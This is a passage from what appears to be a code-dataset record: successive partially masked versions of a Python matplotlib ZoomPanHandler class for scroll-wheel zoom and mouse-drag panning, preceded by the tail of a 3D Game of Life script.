self.get_next_square_state((i,j,k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2]+1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1]+1):\n s = ''\n for i in range(ws[0][0], ws[1][0]+1):\n if self.is_active((i,j,k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[(i,j,k)] = '#'\n return world\n\ninp = 'test.txt'\nif len(sys.argv) == 2:\n inp = sys.argv[1]\n\nworld = parse_world([r.strip() for r in open(inp, 'r').readlines()])\n\nl = life(world)\nl.print()\nl.run(6)\nprint(l.count_active())\n",
"step-ids": [
10,
11,
12,
14,
16
]
}
|
[
10,
11,
12,
14,
16
] |
<|reserved_special_token_0|>
class ZoomPanHandler:
<|reserved_special_token_0|>
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
        Applies the zoom and pan transforms to the axes. Useful after resetting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
        # get_xlim()/get_ylim() return plain tuples, which do not support the
        # in-place subtraction below, so convert to arrays first.
        xlim = np.array(self.axes.get_xlim())
        ylim = np.array(self.axes.get_ylim())
        xlim -= event.xdata - self._press_coords[0]
        ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
<|reserved_special_token_0|>
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
<|reserved_special_token_0|>
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
        Applies the zoom and pan transforms to the axes. Useful after resetting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
        # get_xlim()/get_ylim() return plain tuples, which do not support the
        # in-place subtraction below, so convert to arrays first.
        xlim = np.array(self.axes.get_xlim())
        ylim = np.array(self.axes.get_ylim())
        xlim -= event.xdata - self._press_coords[0]
        ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
        Applies the zoom and pan transforms to the axes. Useful after resetting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
        # get_xlim()/get_ylim() return plain tuples, which do not support the
        # in-place subtraction below, so convert to arrays first.
        xlim = np.array(self.axes.get_xlim())
        ylim = np.array(self.axes.get_ylim())
        xlim -= event.xdata - self._press_coords[0]
        ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
        Applies the zoom and pan transforms to the axes. Useful after resetting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
        # get_xlim()/get_ylim() return plain tuples, which do not support the
        # in-place subtraction below, so convert to arrays first.
        xlim = np.array(self.axes.get_xlim())
        ylim = np.array(self.axes.get_ylim())
        xlim -= event.xdata - self._press_coords[0]
        ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
def main():
import matplotlib.pyplot as plt
fig = plt.figure()
axes = fig.add_subplot(111)
axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(0, 20, 1), color='r',
marker='o')
hand = ZoomPanHandler(axes, scale_factor=1.5)
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
# Mouse action callback IDs
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
        Applies the zoom and pan transforms to the axes. Useful after resetting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
# Private methods
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
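            # Distances from the cursor to each current limit; scaling these
            # (rather than the limits themselves) keeps the point under the
            # cursor fixed while zooming.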
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up': # zoom-in
xlim = [xdata - xmin / self.scale_factor,
xdata + xmax / self.scale_factor]
ylim = [ydata - ymin / self.scale_factor,
ydata + ymax / self.scale_factor]
elif event.button == 'down': # zoom-out
xlim = [xdata - xmin * self.scale_factor,
xdata + xmax * self.scale_factor]
ylim = [ydata - ymin * self.scale_factor,
ydata + ymax * self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = (event.xdata, event.ydata)
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
        # get_xlim()/get_ylim() return plain tuples, which do not support the
        # in-place subtraction below, so convert to arrays first.
        xlim = np.array(self.axes.get_xlim())
        ylim = np.array(self.axes.get_ylim())
        xlim -= (event.xdata - self._press_coords[0])
        ylim -= (event.ydata - self._press_coords[1])
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect(
'scroll_event', self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect(
'button_press_event', self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect(
'motion_notify_event', self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
def main():
import matplotlib.pyplot as plt
fig = plt.figure()
axes = fig.add_subplot(111)
axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(
0, 20, 1), color='r', marker='o')
hand = ZoomPanHandler(axes, scale_factor=1.5)
plt.show()
if __name__ == '__main__':
main()
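A further usage sketch (illustrative, with assumed data): apply_transforms()
can restore the captured view after Axes.clear() resets the limits.

def replot_example():
    import matplotlib.pyplot as plt
    fig = plt.figure()
    axes = fig.add_subplot(111)
    axes.plot(np.arange(10), np.arange(10) ** 2)
    handler = ZoomPanHandler(axes, scale_factor=1.5)
    handler.set_base_transforms()  # capture the current limits
    axes.clear()                   # clearing wipes the data and the limits
    axes.plot(np.arange(10), np.arange(10) ** 2)
    handler.apply_transforms()     # re-apply the captured limits
    plt.show()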
|
flexible
|
{
"blob_id": "6afcb8f17f7436f0ae9fa3a8c2a195245a9801f1",
"index": 6533,
"step-1": "<mask token>\n\n\nclass ZoomPanHandler:\n <mask token>\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n <mask token>\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ZoomPanHandler:\n <mask token>\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n 
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - 